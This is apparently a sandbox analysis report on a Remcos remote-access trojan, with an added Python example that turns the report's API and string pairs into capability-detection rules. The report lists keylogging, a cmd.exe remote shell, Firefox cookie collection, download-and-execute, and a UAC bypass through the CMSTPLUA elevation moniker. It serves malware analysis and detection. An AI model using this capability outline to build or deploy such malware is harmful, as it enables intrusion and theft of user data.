                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                • API String ID: 240030777-3166923314
                                • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                Uniqueness

                                Uniqueness Score: -1.00%
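The records above each pair an API set with a string set: the file manager (FindFirstFileW/DeleteFileA/ShellExecuteW with "Browsing directory", "Deleted file"), the pipe-backed cmd.exe shell (CreatePipe/CreateProcessA/PeekNamedPipe), the registry watchdog (RegCreateKeyA/RegSetValueExA/OpenMutexA with "Remcos restarted by watchdog!"), Toolhelp process enumeration aimed at ieinstal.exe/ielowutil.exe, the clipboard read that ends in send, and the CoGetObject call next to "Elevation:Administrator!new:" and the CMSTPLUA CLSID. The Python below is an added example, not Joe Sandbox code or code from the sample: it turns those pairs into capability rules that fire only when a single function holds both the API set and a string witness, and it recovers the elevation moniker's target CLSID even though the sample stores the prefix and the CLSID as separate strings. The function labels, rule names and ATT&CK mapping are the editor's assumptions; the sample records are constructed from the listings above.

```python
"""Capability triage from per-function API/string co-occurrence (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Set, Tuple

# Constructed input modelled on the report records above (API set and string
# set per function, addresses dropped). Function labels are placeholders.
SAMPLE_FUNCTIONS: Dict[str, Dict[str, Set[str]]] = {
    "fn_file_manager": {
        "apis": {"ShellExecuteW", "GetLogicalDriveStringsA", "DeleteFileA",
                 "FindFirstFileW", "FindNextFileW", "send"},
        "strings": {"Browsing directory: ", "Deleted file: ", "Executing file: ", "open"}},
    "fn_remote_shell": {
        "apis": {"CreatePipe", "CreateProcessA", "PeekNamedPipe", "ReadFile",
                 "WriteFile", "TerminateProcess", "CloseHandle", "Sleep", "send"},
        "strings": {"cmd.exe", "SystemDrive"}},
    "fn_watchdog": {
        "apis": {"GetCurrentProcessId", "RegCreateKeyA", "RegSetValueExA",
                 "OpenMutexA", "CreateThread", "OpenProcess"},
        "strings": {"Remcos restarted by watchdog!", "svchost.exe", "rmclient.exe"}},
    "fn_find_target": {
        "apis": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
                 "OpenProcess", "CloseHandle"},
        "strings": {"ieinstal.exe", "ielowutil.exe", "Inj"}},
    "fn_clipboard": {
        "apis": {"OpenClipboard", "GetClipboardData", "SetClipboardData", "send"},
        "strings": set()},
    "fn_elevate": {
        "apis": {"CoGetObject", "_wcslen"},
        "strings": {"Elevation:Administrator!new:", "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"}},
    "fn_crt_locale": {  # CRT locale init; must match no rule
        "apis": {"GetUserDefaultLCID", "IsValidCodePage", "GetLocaleInfoW"},
        "strings": set()},
}


@dataclass(frozen=True)
class Rule:
    name: str
    attack: str                        # ATT&CK technique (editor's mapping)
    apis_all: FrozenSet[str]           # every listed API must be present
    strings_any: Tuple[str, ...] = ()  # if given, at least one regex must hit


RULES: List[Rule] = [
    Rule("file_manager_browse_delete_exec", "T1083",
         frozenset({"FindFirstFileW", "DeleteFileA", "ShellExecuteW"}),
         (r"^(Browsing directory|Deleted file|Executing file): ",)),
    Rule("remote_shell_over_pipes", "T1059.003",
         frozenset({"CreatePipe", "CreateProcessA", "PeekNamedPipe"}), (r"cmd\.exe",)),
    Rule("registry_watchdog_restart", "T1547.001",
         frozenset({"RegCreateKeyA", "RegSetValueExA", "OpenMutexA"}), (r"[Ww]atchdog",)),
    Rule("process_enum_for_injection_target", "T1057",
         frozenset({"CreateToolhelp32Snapshot", "Process32NextW", "OpenProcess"}),
         (r"^(ieinstal|ielowutil)\.exe$",)),
    Rule("clipboard_read_and_send", "T1115",
         frozenset({"OpenClipboard", "GetClipboardData", "send"})),
    Rule("uac_bypass_elevation_moniker", "T1548.002",
         frozenset({"CoGetObject"}), (r"Elevation:Administrator!new:",)),
]

GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"  # from the record above


def elevation_targets(strings: Set[str]) -> List[str]:
    """CLSIDs an elevation moniker in this function could name. The sample keeps
    the 'Elevation:Administrator!new:' prefix and the CLSID as separate strings
    and joins them at runtime, so match the prefix, then collect every GUID."""
    if not any("Elevation:Administrator!new:" in s for s in strings):
        return []
    return sorted({m.group(0).upper() for s in strings for m in GUID_RE.finditer(s)})


def match_rules(func: Dict[str, Set[str]]) -> List[Tuple[str, str, List[str]]]:
    """(rule, technique, evidence) for every rule this one function satisfies."""
    hits = []
    for rule in RULES:
        if not rule.apis_all <= func["apis"]:
            continue
        evidence = sorted(rule.apis_all)
        if rule.strings_any:
            matched = sorted(s for s in func["strings"]
                             if any(re.search(p, s) for p in rule.strings_any))
            if not matched:
                continue
            evidence += matched
        hits.append((rule.name, rule.attack, evidence))
    return hits


def triage(functions: Dict[str, Dict[str, Set[str]]]) -> Dict[str, list]:
    """Function label -> rule hits, omitting functions that hit nothing."""
    return {name: hits for name, fn in functions.items() if (hits := match_rules(fn))}


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_FUNCTIONS).items():
        for rule, technique, evidence in hits:
            print(f"{name}: {rule} [{technique}] evidence={evidence}")
    print("elevation targets:", elevation_targets(SAMPLE_FUNCTIONS["fn_elevate"]["strings"]))
```

Requiring the string witness in the same function is what keeps the CRT locale record, and a generic CreatePipe/CreateProcess wrapper with no cmd.exe string, from firing; a rule that only checked imports would flag far more benign code.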

                                APIs
                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                • GetLastError.KERNEL32 ref: 0041A7BB
                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                • String ID:
                                • API String ID: 3587775597-0
                                • Opcode ID: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                • Opcode Fuzzy Hash: f0a508092aeabfb754dac70d46392ce52f729929a0f06f3e8fb072e170aa9964
                                • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: (eF$(x$8SG$PXG$PXG$NG
                                • API String ID: 341183262-2834469137
                                • Opcode ID: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                • Opcode Fuzzy Hash: 1dfe3cfc7b79d75524d00d8ccab6f132fb387ae8ec27b841a732b59c95e35a52
                                • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID: lJD$lJD$lJD
                                • API String ID: 745075371-479184356
                                • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                • FindClose.KERNEL32(00000000), ref: 0040C47D
                                • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 1164774033-405221262
                                • Opcode ID: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                • Opcode Fuzzy Hash: f210557bed675ad5d36221f6052a79efeb781c0a156dbb9e3500e3c2c137b3c7
                                • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                • String ID:
                                • API String ID: 2341273852-0
                                • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32(?), ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetForegroundWindow.USER32 ref: 0040A416
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • GetKeyState.USER32(00000010), ref: 0040A433
                                • GetKeyboardState.USER32(?), ref: 0040A43E
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$PkGNG
                                • API String ID: 4168288129-3873169313
                                • Opcode ID: d95690e0b6e6c864278ea550f2cfeefdc475363cedebba9bd57c416b56382187
                                • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                                • Opcode Fuzzy Hash: d95690e0b6e6c864278ea550f2cfeefdc475363cedebba9bd57c416b56382187
                                • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                • Opcode Fuzzy Hash: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: aF$ aF$C:\Users\user\Desktop\1m70ggeepT.exe$open
                                • API String ID: 2825088817-3600594789
                                • Opcode ID: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                • Opcode Fuzzy Hash: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID: hdF
                                • API String ID: 1771804793-665520524
                                • Opcode ID: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                • Opcode Fuzzy Hash: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
